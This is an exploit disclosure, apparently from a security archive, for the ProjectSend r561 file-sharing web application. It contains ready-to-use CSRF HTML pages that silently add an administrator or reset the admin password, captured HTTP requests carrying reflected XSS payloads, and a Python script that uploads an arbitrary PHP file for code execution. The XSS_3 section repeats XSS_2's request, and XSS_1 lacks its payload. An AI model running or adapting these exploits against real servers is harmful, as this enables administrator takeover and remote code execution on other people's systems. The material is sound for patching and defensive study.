ProjectSend r561 CSRF / XSS / Shell Upload

2015.04.28
Risk: High
Local: No
Remote: Yes
CVE: N/A

#[+] Author: TUNISIAN CYBER #[+] Title: ProjectSend Multiple Vulnerabilities #[+] Date: 25-04-2015 #[+] Vendor: http://www.projectsend.org/ #[+] Download:http://www.projectsend.org/download/67/ #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] Twitter: @TCYB3R It's a long one so let's start... I/ CSRF: Add Admin <html> <head> <title>ProjectSend CSRF (Add User)</title> </head> <body> <form action="http://192.168.186.129/ProjectSend-r561/users-add.php" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="add_user_form_name" value="CSRF OPS" /> <input type="hidden" name="add_user_form_user" value="TUNISIANCYBER" /> <input type="hidden" name="add_user_form_pass" value="password" /> <input type="hidden" name="add_user_form_email" value="pwn3d@csrf.com" /> <input type="hidden" name="add_user_form_level" value="9" /> <input type="hidden" name="add_user_form_active" checked="checked" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> 0x0Proof: http://i.imgur.com/t77Plve.png II/ CSRF: Change Admin Password: <html> <head> <title>ProjectSend CSRF (Change Password)</title> </head> <body> <form action="http://192.168.186.129/ProjectSend-r561/users-edit.php?id=1" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="add_user_form_name" value="User changed" /> <input type="hidden" name="add_user_form_user" value="admin" /> <input type="hidden" name="add_user_form_pass" value="password" /> <input type="hidden" name="add_user_form_email" value="newemail@opss.net" /> <input type="hidden" name="add_user_form_level" value="9" /> <input type="hidden" name="add_user_form_active" checked="checked" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> III/ XSS_1 (index.php): Host: 192.168.186.129 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 78 0x0Proof: http://i.imgur.com/TDfFDU3.png IV/ XSS_2 (clients.php): http://192.168.186.129/ProjectSend-r561/clients.php POST /ProjectSend-r561/clients.php HTTP/1.1 Host: 192.168.186.129 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 64 search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E HTTP/1.1 200 OK Date: Sat, 25 Apr 2015 21:15:13 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.39-0+deb7u2 Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2851 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html 0x0Proof: http://i.imgur.com/ywf8JdF.png V/XSS_3 (actions-log.php) http://192.168.186.129/ProjectSend-r561/clients.php POST /ProjectSend-r561/clients.php HTTP/1.1 Host: 192.168.186.129 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 64 search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E HTTP/1.1 200 OK Date: Sat, 25 Apr 2015 21:15:13 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.39-0+deb7u2 Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2851 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html 0x0Proof: http://i.imgur.com/cVKIhj3.png VI/ File Upload: (Exploit oirignally found by Fady Mohamed Osman ) Rewrittend by TUNISIAN CYBER #!/usr/bin/env python import requests print"+---------------------------------------+" print"| ProjectSend File Upload Vulnerability |" print"+---------------------------------------+" vuln = raw_input('Vulnerable Site:') fname = raw_input('EvilFile:') with open(fname, 'w') as fout: fout.write("<?php phpinfo() ?>") url = vuln +'/process-upload.php' +'?name=' + fname files = {'file': open(fname, 'rb')} result = requests.post(url, files=files) print "===>" +vuln+"/upload/files/"+fname


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top